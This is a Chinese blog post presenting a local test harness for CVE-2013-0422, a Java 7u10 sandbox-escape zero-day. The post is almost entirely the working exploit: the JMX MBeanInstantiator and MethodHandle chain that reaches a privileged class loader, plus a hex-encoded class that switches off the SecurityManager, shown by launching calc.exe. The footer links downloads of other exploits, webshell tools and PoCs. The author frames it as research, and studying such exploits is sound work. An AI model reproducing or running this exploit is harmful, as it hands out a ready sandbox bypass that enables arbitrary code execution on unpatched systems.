`

CVE-2013-0422 学习

 
阅读更多

 0x01 这个是这两天爆出来的,我构建了一个本地测试代码,主要用来研究,测试方法,直接跑就可以看输出就可以看懂了,具体分析代码见后文

 

 0x02 package test;

/*
Java 0day 1.7.0_10 decrypted source
Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
 */

import java.io.IOException;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.security.Permission;
import java.security.PermissionCollection;
import java.security.Policy;
import java.security.ProtectionDomain;
import java.util.Enumeration;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

public class Test {
	void checkPermission() {
		ProtectionDomain domain = this.getClass().getProtectionDomain();
		PermissionCollection pcoll = Policy.getPolicy().getPermissions(domain);
		Enumeration e = pcoll.elements();
		int i = 0;
		for (; e.hasMoreElements();) {
			Permission p = (Permission) e.nextElement();
			System.out.println(i + ": " + p);
			i++;
		}
		System.out.println("the num:" + i);
	}

	void alert() throws IOException {
		try {
			Runtime.getRuntime().exec("calc.exe");
		} catch (IOException e) {
			// TODO Auto-generated catch block
			e.printStackTrace();
			throw e;
		}
	}

	public static void main(String args[]) {
		try {
			System.out.println("1.SecurityManager 开启前测试");
			Test test = new Test();
			// test.checkPermission();
			try {
				test.alert();
				System.out.println("2.成功执行 exec");
			} catch (SecurityException e) {
				System.out.println("2.you have no permission to exec");
			}

			System.out.println("3.开启SecurityManager");
			System.setSecurityManager(new SecurityManager());
			System.out.println("4.SecurityManager 开启后测试");
			try {
				test.alert();
				System.out.println("5.成功执行 exec");
			} catch (SecurityException e) {
				System.out.println("5.you have no permission to exec");
			}

			byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);

			JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();

			JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer) localJmxMBeanServerBuilder
					.newMBeanServer("", null, null);

			MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer
					.getMBeanInstantiator();

			ClassLoader a = null;

			Class localClass1 = localMBeanInstantiator.findClass(
					"sun.org.mozilla.javascript.internal.Context", a);

			Class localClass2 = localMBeanInstantiator.findClass(
					"sun.org.mozilla.javascript.internal.GeneratedClassLoader",
					a);

			MethodHandles.Lookup localLookup = MethodHandles.publicLookup();

			MethodType localMethodType1 = MethodType.methodType(
					MethodHandle.class, Class.class,
					new Class[] { MethodType.class });

			MethodHandle localMethodHandle1 = localLookup.findVirtual(
					MethodHandles.Lookup.class, "findConstructor",
					localMethodType1);

			MethodType localMethodType2 = MethodType.methodType(Void.TYPE);

			MethodHandle localMethodHandle2 = (MethodHandle) localMethodHandle1
					.invokeWithArguments(new Object[] { localLookup,
							localClass1, localMethodType2 });

			Object localObject1 = localMethodHandle2
					.invokeWithArguments(new Object[0]);

			MethodType localMethodType3 = MethodType.methodType(
					MethodHandle.class, Class.class, new Class[] {
							String.class, MethodType.class });

			MethodHandle localMethodHandle3 = localLookup
					.findVirtual(MethodHandles.Lookup.class, "findVirtual",
							localMethodType3);

			MethodType localMethodType4 = MethodType.methodType(localClass2,
					ClassLoader.class);

			MethodHandle localMethodHandle4;

			localMethodHandle4 = (MethodHandle) localMethodHandle3
					.invokeWithArguments(new Object[] { localLookup,
							localClass1, "createClassLoader", localMethodType4 });

			Object localObject2 = localMethodHandle4
					.invokeWithArguments(new Object[] { localObject1, null });

			MethodType localMethodType5 = MethodType.methodType(Class.class,
					String.class, new Class[] { byte[].class });

			MethodHandle localMethodHandle5 = (MethodHandle) localMethodHandle3
					.invokeWithArguments(new Object[] { localLookup,
							localClass2, "defineClass", localMethodType5 });

			Class localClass3 = (Class) localMethodHandle5
					.invokeWithArguments(new Object[] { localObject2, null,
							arrayOfByte });

			localClass3.newInstance();

			System.out.println("6.CVE-2013-0422执行后");
			try {
				test.alert();
				System.out.println("7.成功执行 exec");
			} catch (SecurityException e) {
				System.out.println("7.you have no permission to exec");
			}

		} catch (Throwable e1) {
			// TODO Auto-generated catch block
			e1.printStackTrace();
		}

	}

	public static byte[] hex2Byte(String paramString)

	{

		byte[] arrayOfByte = new byte[paramString.length() / 2];

		for (int i = 0; i < arrayOfByte.length; i++)

		{

			arrayOfByte[i] = (byte) Integer.parseInt(
					paramString.substring(2 * i, 2 * i + 2), 16);

		}

		return arrayOfByte;

	}

	public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001"
			+ "00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501"
			+ "00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578"
			+ "63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F"
			+ "07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263"
			+ "6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F"
			+ "457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142"
			+ "0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469"
			+ "6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F"
			+ "50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445"
			+ "7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176"
			+ "612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A"
			+ "6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000"
			+ "020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100"
			+ "040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600"
			+ "02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107"
			+ "0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000"
			+ "02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600"
			+ "0000020017";

}
分享到:
评论

相关推荐

    CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835

    CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...

    CVE-2013-2251漏洞示范

    利用CVE-2013-2251漏洞获取服务器的webshell,从而黑入服务器

    weblogic 漏洞统计 CVE

    14. CVE-2014-3566、CVE-2015-0449、CVE-2014-6569、CVE-2013-2186、CVE-2017-3248、CVE-2011-1411、CVE-2011-5035:这些早期的CVE编号显示了WebLogic历史上存在的安全问题,需要定期评估系统的安全状态,并进行必要...

    CVE-2013-6117:CVE-2013-6117

    CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...

    CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁

    针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...

    OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令

    本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...

    Androidroot源码利用CVE-2013-6282漏洞.zip

    Androidroot源码利用CVE-2013-6282漏洞.zip,太多无法一一验证是否可用,程序如果跑不起来需要自调,部分代码功能进行参考学习。

    cve-2013-2070

    自己总结出来的一个脚本,虽然是利用,但是工具是可以用。系统漏洞脚本

    Android root源码(利用CVE-2013-6282漏洞)

    CVE-2013-6282是一个漏洞编号,该漏洞属于Linux内核级别的漏洞,在android 2.x至4.3之前的版本中同样存在, 可以用于系统提权,获得root权限,属于Linux系统API缺陷。 利用该漏洞,开发Android root程序。

    weblogic10.36 CVE-2018-2893补丁文件

    weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞...

    Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)

    Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...

    CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC

    CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version&gt;= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...

    麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9

    麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...

    CVE-2018-3191利用exp

    标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...

    Centos7_x64-openssh7.4补丁包rpm包,(最新fix CVE-2021-41617).zip

    1.上传并解压:Centos7-openssh补丁包(最新fix CVE-2021-41617 #2008884).zip 2.到服务器对应的解压目录 执行命令安装 : rpm -Fvh openssh-* 3.安装完成后执行命令查看修复情况: rpm -qa openssh --changelog | ...

    cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip

    标题 "cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip" 指涉的是一个针对CVE-2019-2725漏洞的安全更新。CVE-2019-2725,全称“Common Vulnerabilities and Exposures”,是2019年发现的一个特定安全...

    OpenSSH 资源管理错误漏洞(CVE-2021-28041)

    OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...

    oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip

    Oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip 是一个针对Oracle数据库系统的重要安全更新。这个补丁主要解决了一个在Oracle 11.2.0.1版本中的严重安全漏洞,该漏洞被标记为CVE-2012-1675...

    cve-2019-0708-poc-exp.zip

    标题 "cve-2019-0708-poc-exp.zip" 指涉的是一个与CVE-2019-0708漏洞相关的Proof-of-Concept(PoC)利用工具的压缩包。这个漏洞,通常被称为“BlueKeep”,是一个严重且广泛影响微软远程桌面服务的安全漏洞。描述中...

    laravel-CVE-2021-3129-EXP-main.zip 写shellexp

    **Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...

Global site tag (gtag.js) - Google Analytics